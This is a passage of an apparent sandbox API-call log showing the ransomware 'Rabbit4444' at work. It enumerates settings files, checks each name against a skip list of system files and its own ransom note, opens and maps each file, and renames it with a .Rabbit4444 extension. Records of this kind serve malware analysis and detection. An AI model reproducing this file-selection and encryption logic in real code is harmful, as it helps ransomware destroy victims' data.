hHeap=0xe0000) returned 1 [0059.093] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.093] CloseHandle (hObject=0x298) returned 1 [0059.093] CloseHandle (hObject=0x278) returned 1 [0059.093] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms.Rabbit4444") returned 192 [0059.093] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{875fe7d6-5bdf-496f-b349-91e5e3625b86}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{875fe7d6-5bdf-496f-b349-91e5e3625b86}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.097] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5306c443, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5306c443, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233016ec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", cAlternateFileName="CL91DE~1.SET")) returned 1 [0059.097] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2=".") returned 1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="..") returned 1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="windows") returned -1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="boot") returned 1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.098] lstrcmpiW (lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.098] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms" | out: lpString1="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms") returned="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms" [0059.098] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.098] lstrlenW (lpString="Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms") returned 64 [0059.098] lstrlenW (lpString="Rabbit4444") returned 10 [0059.098] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.098] lstrlenW (lpString=".dll") returned 4 [0059.098] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.098] lstrlenW (lpString=".lnk") returned 4 [0059.098] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.098] lstrlenW (lpString=".ini") returned 4 [0059.098] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.098] lstrlenW (lpString=".sys") returned 4 [0059.098] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.098] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{87842a7e-d784-458d-bef4-cfdc632dcf3e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.099] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.099] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15040955979) returned 1 [0059.099] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1012) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0059.099] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.102] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15041366482) returned 1 [0059.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0059.103] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.103] CloseHandle (hObject=0x298) returned 1 [0059.103] CloseHandle (hObject=0x278) returned 1 [0059.103] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms.Rabbit4444") returned 192 [0059.103] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{87842a7e-d784-458d-bef4-cfdc632dcf3e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{87842a7e-d784-458d-bef4-cfdc632dcf3e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.105] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53104d96, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53104d96, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", cAlternateFileName="CLF8F4~1.SET")) returned 1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2=".") returned 1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="..") returned 1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="windows") returned -1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="boot") returned 1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.105] lstrcmpiW (lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.105] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms" | out: lpString1="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms") returned="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms" [0059.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.105] lstrlenW (lpString="Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms") returned 64 [0059.106] lstrlenW (lpString="Rabbit4444") returned 10 [0059.106] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.106] lstrlenW (lpString=".dll") returned 4 [0059.106] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.106] lstrlenW (lpString=".lnk") returned 4 [0059.106] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.106] lstrlenW (lpString=".ini") returned 4 [0059.106] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.106] lstrlenW (lpString=".sys") returned 4 [0059.106] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.106] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.106] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.106] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15041687507) returned 1 [0059.106] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1042) returned 1 [0059.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0059.106] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0059.107] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0059.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.109] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15041953018) returned 1 [0059.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0059.109] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.109] CloseHandle (hObject=0x298) returned 1 [0059.109] CloseHandle (hObject=0x278) returned 1 [0059.109] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms.Rabbit4444") returned 192 [0059.109] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.110] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5319d704, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5319d704, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2222ad59, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", cAlternateFileName="CLD1CE~1.SET")) returned 1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2=".") returned 1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="..") returned 1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="windows") returned -1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="boot") returned 1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.110] lstrcmpiW (lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.110] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms" | out: lpString1="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms") returned="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms" [0059.110] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.112] lstrlenW (lpString="Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms") returned 64 [0059.112] lstrlenW (lpString="Rabbit4444") returned 10 [0059.112] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.112] lstrlenW (lpString=".dll") returned 4 [0059.112] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.112] lstrlenW (lpString=".lnk") returned 4 [0059.112] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.112] lstrlenW (lpString=".ini") returned 4 [0059.112] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.112] lstrlenW (lpString=".sys") returned 4 [0059.112] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{886edafc-1051-483f-8ae2-904087a7e580}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.113] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.113] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15042330556) returned 1 [0059.113] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1118) returned 1 [0059.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0059.113] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0059.114] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0059.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.115] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15042605405) returned 1 [0059.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0059.115] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.116] CloseHandle (hObject=0x298) returned 1 [0059.116] CloseHandle (hObject=0x278) returned 1 [0059.116] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms.Rabbit4444") returned 192 [0059.116] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{886edafc-1051-483f-8ae2-904087a7e580}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{886edafc-1051-483f-8ae2-904087a7e580}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.116] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53236070, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53236070, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", cAlternateFileName="CL4C32~1.SET")) returned 1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2=".") returned 1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="..") returned 1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="windows") returned -1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="boot") returned 1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.117] lstrcmpiW (lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.117] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms" | 